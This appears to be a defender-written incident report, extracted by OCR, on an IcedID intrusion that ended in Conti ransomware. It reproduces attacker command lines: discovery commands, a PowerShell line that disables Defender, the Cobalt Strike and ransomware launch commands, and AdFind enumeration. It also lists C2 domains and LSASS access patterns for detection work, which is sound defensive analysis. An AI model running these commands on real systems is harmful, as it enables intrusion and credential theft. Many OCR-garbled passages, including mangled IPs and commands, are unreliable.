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In this intrusion from December 2021, the threat actors utilized IcedID as the initial access 
vector. IcedID is a banking trojan that first appeared in 2017, usually, it is delivered via 
malspam campaigns and has been widely used as an initial access vector in multiple 
ransomware intrusions. 


Upon execution of the IcedID DLL, discovery activity was performed which was followed by 
the dropping of a Cobalt Strike beacon on the infected host. Along the way, the threat actors 
installed remote management tools such as Atera and Splashtop for persisting in the 
environment. While remaining dormant most of the time, the adversary deployed Conti 
ransomware on the 19th day (shortly after Christmas), resulting in domain wide encryption. 


Case Summary 


We assess with high confidence that the “Stolen Image Evidence” email campaign was used 
to deliver the IcedID DLL. This was first reported by Microsoft in April 2021. 


Upon execution of the IcedID DLL, a connection to a C2 server was established. This was 
followed by the creation of a scheduled task on the beachhead host to establish persistence. 
The task executed the IcedID payload every one 1 hour. The IcedID malware then used 
Windows utilities such as net, chcp, nltest, and wmic, to perform discovery activity on the 
host. 


After a gap of almost an hour, a Cobalt Strike beacon was dropped and executed on the 
beachhead host. Soon after, another round of discovery was performed from the Cobalt 
Strike beacon focusing on the Windows domain. Nltest and net group were utilized to look 
for sensitive groups such as Domain Admins and Enterprise Admins. Process injection into 
explorer.exe was then observed from the Cobalt Strike Beacon. 


The threat actors proceeded to install remote management tools such as Atera Agent and 
Splashtop. Use of these 3rd party administrative tools allow the threat actors another 
“legitimate” means of persistence and access if they were to lose their malware connection. In 
this intrusion, we observed usage of gmail[.]com and outlook[.]com email accounts for Atera 
agent registration. Soon after, one of the injected Cobalt Strike processes accessed LSASS 
memory to dump credentials from the beachhead. 


On the sixth day of the intrusion, the beachhead host saw new discovery activity with a quick 
nltest followed by the PowerView script Invoke-ShareFinder. On the following day, the 
seventh day of the intrusion, the threat actors made their next move. On that day, a new 
Cobalt Strike server was observed, in fact over the course of the intrusion, four different 
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Cobalt Strike servers were used. From the beachhead host, a DLL was transferred to a 
domain controller over SMB and then a remote service was created on the domain controller 
to execute the Cobalt Strike DLL. 


After getting a foothold on the domain controller, we saw more process injection followed by 
the same pattern of installing Atera for additional persistent access. From the domain 
controller, the threat actors proceeded with more discovery tasks including AdFind and 
Invoke-ShareFinder again. After this, the threat actors went quiet. 


On day nine of the intrusion, the next Cobalt Strike server, which would ultimately be used 
until the end of the intrusion, was observed for the first time. On the tenth day, little activity 
was observed but the threat actors connected to the beachhead host via the Atera agent and 
executed another Cobalt Strike DLL. A little discovery check-in was observed on the 14th day, 
but little else. 


On the 19th day, the threat actors moved towards their final objectives. They reviewed the 
directory structure of several hosts including domain controllers and backup servers. They 
then dropped their final ransomware payload on the beachhead host and attempted to 
execute it using a batch file named backup.bat. However, they found that their execution 
failed. 


They left for a few hours, and then returned, and attempted to exploit a couple of CVE's in an 
attempt to escalate privileges. The threat actors had already secured domain admin access 
but it's possible the operator may have thought they lacked permissions when their first 
ransomware execution failed. 


While these exploits appear to have failed the threat actors found their previously captured 
domain admin credentials and launched two new Cobalt Strike beacons on the domain 
controllers. Finally, twenty minutes after accessing the domain controllers, the threat actors 
dropped the ransomware DLL and the batch script and executed it from the domain 
controller. This time the execution worked as intended and resulted in domain wide 
ransomware. 


Services 


We offer multiple services including a Threat Feed service which tracks Command and 
Control frameworks such as Cobalt Strike, BazarLoader, Covenant, Metasploit, Empire, 
PoshC2, etc. More information on this service and others can be found here. 


We also have artifacts and IOCs available from this case such as pcaps, memory captures, 
files, event logs including Sysmon, Kape packages, and more, under our Security Researcher 
and Organization services. 


Timeline 
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Stolen Images Campaign Ends in Conti Ransomware 


23:14 UTC - IcedID Execution 


REGSVR32.EXE 
23:14 UTC - IcedID Command 


and Control 


guguchrome.com 


23:14 UTC - Persistence 5.181.80.214:80 


23:15 UTC - Discovery 


cmd.exe /c chcp >&2 


Scheduled Task 


renz WMIC /Node:localhost /Namespace:\\root\ 


SecurityCenter2 Path AntiVirusProduct 


Get * /Format:List 
ipconfig /all 
systeminfo 

net config workstation 


nitest /domain trusts 


01:06 UTC - Cobalt Strike 


Beacon 


Faicuy4.exe 


01:23 UTC - Discovery bunced.net (103.208.86.7:80) 


nitest /dclist 


net group /domain "Domain Computers" 01:26 UTC - Process Injection 


net group /domain "Domain Admins" 


net group /domain "Enterprise Admins" Faicuy4.exe » explorer.exe 


01:28 UTC - Remote Access 


Software Install on Beachhead 


AteraAgent.exe 


01:40 UTC - Credential 


SplashtopStreamer3360.exe 
Access 


14:58 UTC - Cobalt Strike 


Command and Control 


ljucko32.dll 
Edebef4.dil 
wayeyoy.com (172.241.29.192) rundll32.exe > winlogon.exe 


19:51 UTC - Discovery 


dilhost.exe access to lsass memory 
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regsvr32.exe /s /n /i:"-m -net -size 10 - f 
nomutex -p \\HOST\CS" x64.dll Escalation Attempt (CVE- 


C:\Windows\system32\cmd.exe /C nltest /dclist: 


Invoke-ShareFinder 


New Cobalt Strike Command and Control 


13:56 UTC - Lateral 


Movement to Domain 


cirite.com (23.81.246.30:443) J Controller 


rundil32.exe \\[REDACTED]\cS\ProgramData\c64_dll, StartA 


13:57 UTC - Process Injection 


rundll32.exe > winlogon.exe 


14:01 UTC - Remote Access 


Software Install on Domain 
Controller 


C:\Windows\System32\msiexec.exe /i C:\programdata\sql.msi 


14:23 UTC - Discovery AteraAgent.exe 


adf.bat 


AdFind.exe 


Invoke-ShareFinder 


New Cobalt Strike Command and Control 


L 216.73.159.33:80 (shytur.com) 


19:54 UTC - New Cobalt Strike 


Beacon & Disable Defender on 
Beachhead 


rundll32.exe C:\ProgramData\file.dil DilRegisterServer 


i Downloaded and executed by the Atera agent 


powershell -nop -exec bypass - 
EncodedCommand ... 


powershell Set-MpPreference - 
DisableRealtimeMonitoring Strue 


17:04 UTC - Discovery 


net group /domain "Domain Admins" 


C:\Windows\system32\cmd.exe /C nltest /dclist 


16:25 UTC - Backup Discovery 


cmd.exe /C dir "\\HOST\CS" /s >> listback.txt 
19:58 UTC - Beachead Host 


Attempted Ransomware Deployment 


cmd.exe /C backup.bat 
22:11 UTC - Privilege 


2021-42278 and CVE-2021- 
42287) 


no encryption observed yet 


Scanning activity 


22:13 UTC - Lateral Movement QueryName: SAMTHEADMIN-92 
to Domain Controllers Image: C:\Windows\system32\dllhost.exe 
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QueryName: shytur.com J 
PipeName: \MSSE-3328-server 
Image: \\DOMAINCONTROLLER\ADMINS\61582ab.exe 22:31 UTC- Impact: Data 


PipeName: \MSSE-7544-server Encrypted Ransomware 
[ DOMAINCONTROLLER\ADMINS\044b7el ` z 
soe N abet executed via domain 


controller 


cmd.exe /C backup.bat 


regsvr32.exe /s /n /i:"-m -net -size 10 - 
nomutex -p \\HOST\CS" x64.dll 


connections via SMB to encrypt and deploy 
ransom note. 


Report lead: @oxtornado 


Contributing analysts: @yatinwad, @MetallicHack, and @ pete o 


Initial Access 


The IcedID DLL, which gave the threat actors a foothold into the environment, was likely 
delivered by a *Stolen Image Evidence" email campaign. 


"Stolen Images" #ContactForms campaign that submits "https://t.co/uc4QkLQt4b" links into 
contact us forms now dropping an .iso file and #IcedID dll. 
https://t.co/LO3TYOYPli(Qabuse ch Looks like https://t.co/ZNWTDSrHT7U incorrectly(?) tags 
the dll as emotet/Heodo... FYI. 


— Sean (@infosecfu) December 9, 2021 


These initial access campaigns reportedly utilize contact forms to send malicious emails to 
intended targets. 


The emails contain a link to a legitimate storage service like those offered by Google and 
Microsoft. In this example, “http://storage.googleapis.com” was used to host a zip file. The 
zip archive contains an ISO file, which once clicked and mounted, shows a document-like 
LNK file. Once the victim opens that LNK file, the IcedID DLL loader executes, downloads, 
and runs the second stage of IcedID. 


Below is a configuration extraction of that initial IcedID malware from an automated 
sandbox analysis of the sample: 


d 
"Campaign ID": 870605016, 
"C2 url": "guguchrome.com" 
J 
Execution 


The graph below shows detailed actions performed through IcedID, including reconnaissance 
and Cobalt Strike beacons drops: 
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Stolen Images Campaign Ends in Conti Ransomware 
H 
i 
H 
I 
regsvr32 exe /s C:\\Users\%REDACTED%\ 
AppData\Local\Temp\Ewge.dll 


net group "Domain Admins" /domain 
net config workstation 
minu Borg iplc regsvr52.exe C:\Users\%REDACTED%\AppData\Local\Temp\ 
baebl5eea3a7Icfaba9d20ef 57 5dcea69cf 51f2ec21f45b85f291699550cb35e53 dll 
C:\Users\%REDACTED*#\AppData\ ——__ 
LocalTemp\Faicuy4 exe nes a 
ze Create Remote Thread 
Connect to Ke 
N Se 
"e 

bo 


net view /all /domain 


ipconfig /all 
Access Process 


SS 
103.208.86.7 : 80 --> bunced.net 
Ñ 
ji 
i 
1 
D 


Create Remote Thread 
^ 
DNS Overy. 


" 
z^ 
Pro 
: 

cirite.com —> 23.81.246.50 f 

li 

I 

i 

I 

I 

1 
cess Process 


cmd.exe /c chep &gt&amp;2 


4 


45.142.215.228 : 80 


5.181.80.113 : 443 — applesflying.com 


91.199.212.52 : 80 
5.181.80.214 : 80 --> guguchrome.com 
Loëd 
` 
1 
1 
! 
1 
1 
i 
i 
H 
1 


192.198.88.110 : 80 
1 

„Connect tom 

dir \\%Domain Computer FADN%\C$ 


9984.2435.75 : 445 
23.106.225.27 : 443 --> www.rihatin.com / 
j 
H 
i p" x 
i a x 
a 
C:\Users\%REDACTED%\AppData\Local\ 172.241.2992 : 443 --> wayeyoy.com 
Temp\Edebef4.dll 
Y 
mstsc.msi 
7 nitest /dclist 
i 
regsvr32.exe /s /n Arm -net -size 10 -nomutex -p \\%REDACTED%\C$" x64.dll — Backup.bat ! net group /domain "Domain Computers" 


1 
Drop file 
Sysmon 11 

1 
1 


1 
D 
C:\Windows\System32\spool\x64.dil 


C:\Windows\System32\downlevel\x64.dil 
C:\Windows\System32\spool\backup.bat 


Persistence 


Scheduled Tasks 
Only one scheduled task was created during this intrusion. The scheduled task was created 
on the beachhead host upon the execution of IcedID DLL, which executed every hour: 


<Exec> 
<Command>rund1132.exe</Command> 
<Arguments>"C:\Users\REDACTED\AppData\Local\{C904416E-A880-3136-ED72- 
AA63AF7DB1F2}\Gaagsp2.d11",D11Main --ob="CapitalLadder\license.dat"</Arguments> 
</Exec> 


Atera Agent 
Threat actors dropped and installed Atera agent (T1219), using two MSI packages "sol mai" 
and “mstsc.msi”, from the Cobalt Strike beacons, which allowed them to have a non-malware 


backdoor in the environment. 
4 Initiating Process Command Line + 4 Action Type + 4 Folder Path + 4 File Name > 4 
FileCreated C:\ProgramData mstsc.msi 
\ Domain Controller NC$ mstsc.msi 
sql.msi 


Explorer . EXE 
FileCreated 


Computer Name + 
Beachhead 
Explorer .EXE 
Domain Controller winlogon.exe FileCreated 


The installation of those two packages reveals two emails potentially belonging to the 


C:\ProgramData 


ransomware operators or affiliates: 
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Initiating Process Command ` 
Computer Name 4 Line $ Process Command Line $ 


Beachhead [ZintegratorLogin=Tnarsnorsia47@gnail com] 


mstsc.msi 


Domain Controller eraAgent.e 


sql.msi 


/IntegratorLogin=""marsmors1947@gmail.com'"" /AccountIid=""0013zZ00002kcnS1AAI" 
/IntegratorLogin=""hughess6623@outlook.com"" /AccountIdz""90013200002kbhSdAAI" 


Atera agent is a remote monitoring and management system. 


At one point in the intrusion the threat actors utilized Atera to download and launch a new 
Cobalt Strike beacon on one of the hosts they had installed the agent on. 


orBixLi98Mf "cmd bfS 


ate: 


RuleName: technique id-T1218.002, tech 
UtcTime: 


le ` RUNDI 
dLine: rundll ogramData\ RegisterServer 


E01BFD8DA9: 2 C381C78384D94F 7BA46949001 7! 57FC9F923, IMPHASH-4DB2 D1576D75C991DC70F68AC 


Privilege Escalation 


There were attempts to exploit Active Directory vulnerabilities CVE-2021-42278 and CVE- 
2021-42287 in order to create privileged accounts. This attempt failed, however, there were 
indicators through DNS requests enumerating accounts for the existence of 
SAMTHEADMIN-XX (XX being a random number). The query status 9003 indicates that 
this does not exist. 


The injected process dllhost.exe requesting SAMTHEADMIN-92 and SAMTHEADMIN-20 
accounts: 
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QueryName + # QueryStatus + d Image + 
SAMTHEADMIN-92 9003 C: \Windows\system32\dllhost. exe 


SAMTHEADMIN-20 9003 C: \Windows\system32\dllhost.exe 


We believe the operator used the publicly available script sam the admin‘ or a variant 
based on it. Part of the script generates a new computer name account in the form 
SAMTHEADMIN- followed by a random value between o to 100, as indicated below. 


The exploitation involves invoking lookups to ensure that the new accounts were successful, 
explaining why failed DNS requests were observed. 


Defense Evasion 


Disable Defender 


A base64 encoded PowerShell command was executed on the beachhead which disabled 
Windows Defender AV (T1562.001). 


Encoded Command: 


powershell -nop -exec bypass -EncodedCommand 
UwB1AHQALQBNAHAAUAByAGUAZgB1AHIAZQBUAGMAZQAGACOARABpAHMAY QBiAGWAZQBSAGUAY QBSAHQAaQBtAG 


The decoded base64 PowerShell command uses Set-MpPreference cmdlet to disable 
Defender’s real time monitoring: 


Set-MpPreference -DisableRealtimeMonitoring $true 


Process Injection 


A number of process injections were seen during this intrusion. The Cobalt Strike beacon 
used the CreateRemoteThread Win32 function in order to inject code into running 
processes. The usage of this function triggers the Sysmon Event ID 8, a well known pattern of 
CS beacon activity. 


Remote threads were created in Winlogon and Explorer processes. 
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,"Microsoft-Windows-Sysmon/Operational", ","144589", , , ,, , ,,, "0x8000000000000000" , "4", , , """CreateRemoteThread detected: 
RuleName: technique id-T1055,technique name-Process Injection 

UteTime: NN 15:53:25.364 

SourceProcessGuid: (78271c4c-76f5-61b3-6561-000000000500) 

SourceProcessId: 2116 

Sourcelmage: C:\Windows\System32\regsvr32.exe 

TargetProcessGuid: (78271c4c-a286-61a3-7105-000000000500) 

TargetProcessId: 1680 

TargetImage: C:\Windows\System32\winlogon. exe 

NewThreadId: 5468 

StartAddress: 0x000002029E1B0008 

StartModule: - 

StartFunction: -""","0",,,,,,,,, "6500", , , " (5770385f-c22a-43e0-bf4c-06f5698ffbd9)" , "Microsoft-Windows-Sysmon",,,,,, "INFORMATION", , ,,,,, SCENE 5 53: 25..36731942",, "8", ,"5988",,,"2" 
,"Microsoft-Windows-Sysmon/Operational",,, SE D "CreateRemoteThread detected: 


RuleName: technique id-T1055,technique name-Process Injection 
UtcTime: ME oi 26: 20.895 

SourceProcessGuid: (78271c4c-a7fe-61b2-b534-000000000500) 

SourceProcessId: 9560 

SourceImage: C: User ERN AppData\Local\Temp\Faicuy4. exe 

TargetProcessGuid: (78271c4c-9fec-61a2-8e00-000000000500) 

TargetProcessId: 6284 

TargetImage: C: WindowsVexplorer.exe 

NewThreadId: 10360 

StartAddress: 0x0000000003520002 

StartModule: - 

StartFunction: =""","g",,,,,,,,, "6500" , , ,"(5770385f-c22a-43e0-bf 4c-06f5698f fbd9) " , "Microsoft-Windows-Sysmon",,,,,, "INFORMATION... [ZEN 26:20.20607027" ,,, 


"8", , "5988", , , "2" 


Credential Access 


LSASS Access 


The threat actors accessed LSASS process memory (T1003.001) on different hosts, including 
domain controllers, using multiple techniques. 


The screenshot below shows the different 
“DesiredAccess” to the LSASS process 
object from different beacons (dllhost.exe, 
Edebef4.dll, etc.) or Task Manager: 


[8396] dilhost.exe 


3 dilhost.exe read Isass.exe process memory 
Bytes copied 6223310 
Number of reads 1868 


Action time 
Mitre techniques T1003.001: LSASS Memory 


Target process i 
diii & [732] Isass.exe 


££ Sensitive credential memory read 


Computer Name + 4 Process Command Line + Z Additional Fields + # Action Type + 4 Initiating Process Command Line + 
lsass.exe ( "DesiredAccess": 5136 ) OpenProcessApiCall "taskmgr.exe" /4 
lsass.exe ( "DesiredAccess": 64 ) OpenProcessApiCall rund1132.exe \\ {MM \c$\ProgramData\c64.dll, StartA 
lsass.exe { "DesiredAccess": 4112 } OpenProcessApiCall dllhost.exe 
lsass.exe { "DesiredAccess": 5136 } OpenProcessApiCall taskmgr 
lsass.exe ( "DesiredAccess": 64 } OpenProcessApiCall regsvr32.exe /s "C: Users MB AppData\Local\Temp\Edebef4.d11" 


The table below maps the “DesiredAccess” values with the actual corresponding access rights, 
and examples of credentials dumping tools requesting those accesses: 
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Desired Hex Process Access Rights Offensive 


Access value Tools 

5136 1410 PROCESS VM READ (0x0010) Mimikatz 
PROCESS QUERY INFORMATION (0x0400)  (Winver <5) 

NanoDump 

PROCESS QUERY LIMITED INFORMATION 
(0x1000)* 

4112 1010 PROCESS VM READ (0x0010) Mimikatz 
PROCESS QUERY LIMITED INFORMATION  (Winver >=6) 
(0x1000) 

64 40 PROCESS DUP HANDLE (0x0040) MirrorDump 


HandleKatz 


* A handle that has the PROCESS. QUERY INFORMATION access right is automatically 
granted PROCESS QUERY LIMITED INFORMATION. 


Those *DesiredAccess" values could be interesting to build detections or hunting queries if 
you are using Sysmon or such a verbose monitoring tool. 


In our case, the access to LSASS process allowed the threat actors to compromise a domain 
admin account, which was then used to move laterally and deploy ransomware. 


Discovery 


Multiple discovery techniques were observed throughout the case. The initial discovery 
techniques were conducted on the beachhead host by the IcedID malware — focusing on 
determining the system language and security products installed (T1518.001). Other familiar 
discovery techniques were then leveraged to establish situational awareness, such as network 
configurations and Windows domain configuration. 


Discovery was achieved using a combination of living off the land techniques (WMIC and 
CMD) and via third-party tools. 
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cmd.exe /c chcp >&2 

ipconfig /all 

systeminfo 

WMIC /Node:localhost /Namespace:NNrootNSecurityCenter2 Path AntiVirusProduct Get * 
/Format:List 

net config workstation 

nltest /domain trusts 

nltest /domain trusts /all trusts 

net view /all /domain 

net view /all 

net group "Domain Admins" /domain 

cmd.exe /C nltest /dclist: 

cmd.exe /C net group /domain "Domain Computers" 
cmd.exe /C net group /domain "Enterprise Admins" 


Threat actors also used “chcp” for discovery of the system locale/language (T1614.001). 
Change Control Page (ChCP) is a Microsoft utility for changing the console control page 
(language). In this case, the existing control page language was collected using the following 
command: 


cmd.exe /c chcp >&2 


As a test, entering this on a command prompt shows a numeric value. The Microsoft link 
shows the number of the language used (437 — United States). 


It is highly likely that the threat actors were establishing the 


country of origin based on the language used — an extra fail- 
safe check to ensure certain users or regions were not targeted. 


The »&2 parameter could indicate a parameter was expected as 
part of a script, or possibly a redirect using stderr. 


The second discovery was from a different Cobalt Strike beacon “Faicuy4.exe” which focused 
on domain discovery and user groups using the net command. 


Once the threat actors had achieved lateral movement to domain controllers, the AdFind 
utility was employed to enumerate active directory objects (T1018). 
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Process Command Line + 


cmd.exe /C adf.bat 


cmd.exe /C adf.bat 


conhost.exe Oxffffffff -ForceV1 


adfind.exe -f "(objectcategory-person)" 


adfind. 


adfind. 


adfind. 


adfind. 


adfind. 


adfind. 


adfind. 


adfind. 


adfind. 


adfind. 


adfind. 


adfind. 


adfind. 


'adf.bat' is a common batch file that we have observed in previous cases, we saw this script in 
2020 as part of a Ryuk intrusion. The recent Conti leaks indicate that Conti operators were 


exe 


exe 


exe 


exe 


exe 


exe 


exe 


exe 


exe 


exe 


exe 


exe 


exe 


-f "(objectcategory=person)" 

-f "objectcategory=computer" 

-f "objectcategory=computer" 

-f "(objectcategory=organizationalUnit)" 
-f "(objectcategory-organizationalUnit)" 
-sc trustdmp 

-sc trustdmp 

-subnets -f (objectCategory=subnet) 
-subnets -f (objectCategory-subnet) 

-f "(objectcategory=group)" 

-f "(objectcategory=group)" 

-gcb -sc trustdmp 


-gcb -sc trustdmp 


surprised Ryuk operators were using their file. 
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Lawrence Abrams @ 
Ki @LawrenceAbrams 
Always been speculation that Conti is a rebrand of 
Ryuk. 


However this chat sounds like the affiliates were 
surprised that Ryuk uses the same TTPs as Conti. 

Or were both operations run by the same "managers," 
but the affiliates were left in the dark? 


#ContiLeaks 


{ 
"ts": "2020-10-14T14:03:28.371585", 
"from": "buza()jq3mcco35auwcstmt.onion", 
"to": "“professor@q3mcco3Sauwcstmt.onion", 
"body": "https://thedfirreport.com/2020/10/08/ryuks -return/" 


c M 


"ts": "2020-10-14T14:06:04.813669", 

"from": "professor()q3mcco35auwcstmt.onion", 

"to": "buza(iq3mcco35auwcstmt.onion", 

"body": "well, not much different from our movements" 


aw 


"ts": "2020-10-14T14:06:08.381836", 

"from": "professor(9q3mcco35auwcstmt.onion", 
"to": “buza@q3mcco3Sauwcstmt.onion", 
"body": "yes, practically nothing" 


ba kee 


"ts": "2020-10-14T14:06:24.230768", 

"from": "professor(jg3mcco35auwcstmt.onion", 

"to": "buza(ijq3mcco35auwcstmt.onion", 

"body": "adf.bat - this is my fucking batch file" 


) 


The PowerView module Invoke-ShareFinder was executed from the beachhead host and a 
domain controller. 


13/35 


"CommandInvocation(Invoke-ShareFinder): " 
ParameterBinding(Invoke-ShareFinder): 
ParameterBinding(Invoke-ShareFinder) : 
ParameterBinding(Invoke-ShareFinder) : 
ParameterBinding(Invoke-ShareFinder) : 
ParameterBinding(Invoke-ShareFinder): 
ParameterBinding(Invoke-ShareFinder) : 
ParameterBinding(Invoke-ShareFinder) : 
ParameterBinding(Invoke-ShareFinder) : 
ParameterBinding(Invoke-ShareFinder) : 
ParameterBinding(Invoke-ShareFinder) : 
ParameterBinding(Invoke-ShareFinder) : 
ParameterBinding(Invoke-ShareFinder): 


voke-ShareFinder" 


CheckShareAccess"; value-"True" 
Verbose"; value="True" 
HostList"; value-"" 


"ExcludeStandard'" ; 
"ExcludePrint"; valu 


"ExcludeIPC 


“NoPing" ; 


name= 
name=" 


CommandInvocation(Out-File): "Out-File" 


ParameterBinding(Out-File): 
ParameterBinding(Out-File): 
ParameterBinding(Out-File) : 
ParameterBinding(Out-File) : 
ParameterBinding(Out-File) : 
ParameterBinding(Out-File) : 
ParameterBinding(Out-File): 
ParameterBinding(Out-File): 
ParameterBinding(Out-File): 
ParameterBinding(Out-File): 
ParameterBinding(Out-File): 
ParameterBinding(Out-File): 
ParameterBinding(Out-File): 
ParameterBinding(Out-File) : 
ParameterBinding(Out-File): 
ParameterBinding(Out-File): 
ParameterBinding(Out-File): 
ParameterBinding(Out-File): 
ParameterBinding(Out-File): 
ParameterBinding(Out-File): 
ParameterBinding(Out-File): 
ParameterBinding(Out-File): 
ParameterBinding(Out-File): 
ParameterBinding(Out-File): 
ParameterBinding(Out-File): 
ParameterBinding(Out-File): 
ParameterBinding(Out-File): 
ParameterBinding(Out-File): 
ParameterBinding(Out-File): 
ParameterBinding(Out-File) : 
ParameterBinding(Out-File) : 
ParameterBinding(Out-File): 
ParameterBinding(Out-File): 
ParameterBinding(Out-File): 


nam 
nam 
nam 
name- 
nam 
name- 
nam 
name- 
nam 


nam 


Some network discovery was conducted using the ping utility to check the existence of hosts 


on the network (T1049). 


"Encoding"; 
FilePath"; 
InputObject"; 
InputObject 
InputObject"; 
InputObject"; 
InputObject" ; 
InputObject" ; 
InputObject"; | 

name-"InputObject" ; 

"InputObject" ; 

name-"InputObject"; 

"InputObject"; | 

"InputObject" ; 

"InputObject" ; 
InputObject" ; 
InputObject" ; 
InputObject" ; 
InputObject"; | 
InputObject"; 
InputObject"; 
InputObject"; 

"InputObject" ; 

"InputObject" ; 

"InputObject" ; 

"InputObject" ; 

"InputObject" ; 

"InputObject" ; 

"InputObject"; 
InputObject"; 
InputObject" ; 
InputObject 
InputObject' 
InputObject" ; 


: value="False" 
value="False" 
value="False" 
CheckAdmin"; value-"False" 
Delay"; value-"8' 

Jitter"; value-'0.3" 
Domain"; value=" 


Ping"; 


value="ascii" 

value="C :\ProgramData\shda. txt" 
; value="\\ 

value="\\ 

value="\\ 


value= 
value= 
value- 
value- 
value- 
value- 
value=") 
value= 
value= 
value= 
value= 


\ADMINS = 
- Default 
INS = 
\C$ - Default 
\ADMLNS - Remote Admin 
Ve? - Default share 
\install =i 
\NETLOGON - Logon server share " 
\SYSVOL - Logon server share " 
\ADMINS - Remote 
$ - Default share" 
INS - Remote 
$ - Default share” 
\ADMINS - Remote 
\C$ - Default share” 
\ADMINS - Remote 
\C$ - Default share" 
- Remote Admin 
- Default share 
- Logon server share " 
- Logon server share " 
INS 
- Default share" 
INS - Remote 
- Default share" 
- Remote 
Default share" 
Remote Admin" 
efault share 
log =" 
\ADMINS 


share” 


share” 


\ADMINS 
\c$ 
\NETLOGON 
\SYSVOL 


- Remote 


Remote Admin" 


Remote Admin" 


Admin" 


Admin" 


Admin” 


Admin” 


- Remote Admin" 


Admin" 


Admin" 


Admin" 
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Process Command Line $ 


cmd.exe /C ping v NM RR 
cmd.exe /C ping VE | 


conhost.exe Oxffffffff -ForceV1 

vine \\ RE \ 

in; T TR 

cnd.exe /C ping RE 
SEET 


conhost.exe Oxffffffff -ForceV1 


Filesystem discovery (T1083) was conducted to collect directory lists to a text file. 


CommandLine: C:\Windows\system32\cmd.exe /C dir 8B | Q /s >> list.txt 


CurrentDirectory: C:\ProgramData\ 
Other variations included: 


e C:\Windows\system32\cmd.exe /C dir “\\<REDACTED>\C$” /s >> listback.txt 
e C:\Windows\system32\cmd.exe /C dir “\\<REDACTED>\C$” /s >> list1.txt 


Lateral Movement 


On the 6th day, the threat actors began their lateral movement activity using SMB to transfer 
Cobalt Strike DLL’s onto a domain controller and another server. 


+ SrciP/Country $ Src Port + Dst IP / Country $ Dst Port $ Packets + Databytes Info 
Bytes 


Services were then created on the hosts to execute the uploaded Cobalt Strike Beacons. 
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On the final day, right before execution of the ransomware, SMB was again used to transfer 
Cobalt Strike Beacon executable to the domain controllers. 


+ Src IP/ Country $Src Port + Dst IP / Country $ Dst Port + Packets + Databytes Info 
Bytes 


The beacons were then executed using a remote service. 


Event 7045, Service Control Manager 


General Details 


A service was Installed in the system. 


Service Name: 044b7e1 
Service File Name: VW ADMINS\044b7e1.exe 


Service Type: user mode service 
Service Start Type: demand start 
Service Account: LocalSystem 


Known Cobalt Strike named pipes were observed on the Domain Controllers with these 


executable beacons. Named pipes connections can be observed through Sysmon Event ID 18. 


Note that the named pipes followed MSSE-[0-9]{4}-server pattern, which indicates that 
the threat actors were using the default Cobalt Strike Artifact Kit binaries: 


pipeName: \MSSE-3328-server and Image: 61582ab.exe 
pipeName: \MSSE-7344-server and Image: 044b7e1.exe 
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LogName-Microsoft-Windows-Sysmon/Operational 
EventCode-18 

EventType-4 

SWISS DC Name | 
User-NOT. TRANSLATED 

Sid-S-1-5-18 

SidType-0 
SourceName=Microsof t - Windows-Sysmon 
Type=Information 

RecordNumber=1717578 


Keywords=None 


TaskCategory=Pipe Connected (rule: PipeEvent) 


OpCode=Informations 

Message=Pipe Connected: 

RuleName: technique id-T1021.002,technique name-SMB/Windows Admin Shares 
EventType: ConnectPipe 

UtcTime: ` ` EDERT 

ProcessGuid: (f2bd618e-3a87-61ca-1808-020000000600) 

ProcessId: 9088 

PipeName: MMSSE-3328-server 


Image: VERE 61 582ab.cxe 
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LogName-Microsoft-Windows-Sysmon/Operational 
EventCode-18 

EventType-4 

ME DCName | 
User=NOT_TRANSLATED 

Sid-S-1-5-18 

SidType-0 


SourceName-Microsoft-Windows-Sysmon 


Type=Information 

RecordNumber=647444 

Keywords=None 

TaskCategory=Pipe Connected (rule: PipeEvent) 
OpCode=Informations 

Message=Pipe Connected: 

RuleName: technique id-T1021.002,technique name-SMB/Windows Admin Shares 
EventType: ConnectPipe 

UtcTime: END 22:13:17.006 

ProcessGuid: {47d5446d-3a7b-61ca-f933-000000000500} 
ProcessId: 7492 

PipeName: MMSSE-7344-server 


Image: W Nun .exe 


Command and Control 


We observed the IcedID DLL dropping multiple CS beacons on the beachhead. 


ljucko32 dll 
Ewge.dll 
Edebef4 dll 


Dropped multiple Cobalt Strike 
IcedID DLL ee 


~~ 
wi 


- 
KN 
- 


ae 
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Action Type = Initiating Process File Name = | Initiating Process Command Line = Initiating Process Folder Path + À Initiating Process Parent File Name + | File Name > 


ows\System32 cmd.exe Edebef4 dll 


LolbinsDownloadedFileFrominternet — regsvr32.exe 
'ea3a7Icfaba9d20ef373dceaG9cf3112ec21145b831291699330cb3e3.di 


LolbinsDownload eFrominternet regsvr32.exe regsvr32.exe cmd.exe Ewge dll 
causer EEA o0 Lo cte mp ba e5136823271c269020613738ce269c2112ec211456831291699330c03e3.dt 
cmd.exe ljucko32 di 
2145b831291699330cb3e3 d 
LolbinsDownloadedFileFrominternet ^ regsvr32 exe regsvi32 exe C:AWindows\System32 cmd.exe Faicuy4.exe 


C:\Users BA 0051 local Te mpibaeb3ee23271cf2ba9020613738cea69c3122ec21(456831291699330cb3e3.di 


Splashtop Streamer 


Threat actors used Splashtop Streamer via Atera agent, allowing them to remotely connect to 
machines without using RDP tunneling or other techniques previously seen in our cases. 


By default, the Splashtop Streamer is automatically installed together with the AteraAgent. 


Computer Name + 4 Initiating Process Command Line + 4 Remote URL + Pd 


"AgentPackageSTRemote.exe" 96550093-7d53-4a54-9644-38a6b2fe6f10 "3cff8f1c-e549-4clf-aabc-343b457afaca" agent- my.splashtop.com 


api.atera.com/Production 443 or8ixLi90Mf "downloadifneeded" 
Beachhead 
"AgentPackageSTRemote.exe" 96550093-7d53-4a54-9644-38a6b2fe6f10 "3cff8f1c-e549-4clf-aabc-343b457afaca" agent- download.splashtop.com 


api.atera.com/Production 443 or8ixLi90Mf "downloadifneeded" 


"AgentPackageSTRemote.exe" 48e674a2-3563-48a1-a224-8ce2e9aada26 "2e346c4a-b87a-443b-b4d8-d899ea8688c3" agent- my.splashtop.com 
api.atera.com/Production 443 or8ixLi90Mf "downloadifneeded" 


Domain Controller 


"AgentPackageSTRemote.exe" 48e674a2-3563-48a1-a224-8ce2e9aada26 "2e346c4a-b87a-443b-b4d8-d899ea8688c3" agent- download.splashtop.com 
api.atera.com/Production 443 or8ixLi90Mf "downloadifneeded" 


Computer Name + P4 Initiating Process File Name + 4 Process Command Line + 


AgentPackageSTRemote.exe "SRUtility.exe" -a "st-streamer://com.splashtop.streamer/?rmm code-hZCDFPhK75mJ" 
Beachhead "SRUtility.exe" -a "st-streamer://com.splashtop.streamer/?rmm session pwd-f8154387506a04e293954372a28e366b" 


ee "SplashtopStreamer3360.exe" prevercheck /s /i sec opt-0,confirm d-0,hidewindow-1 


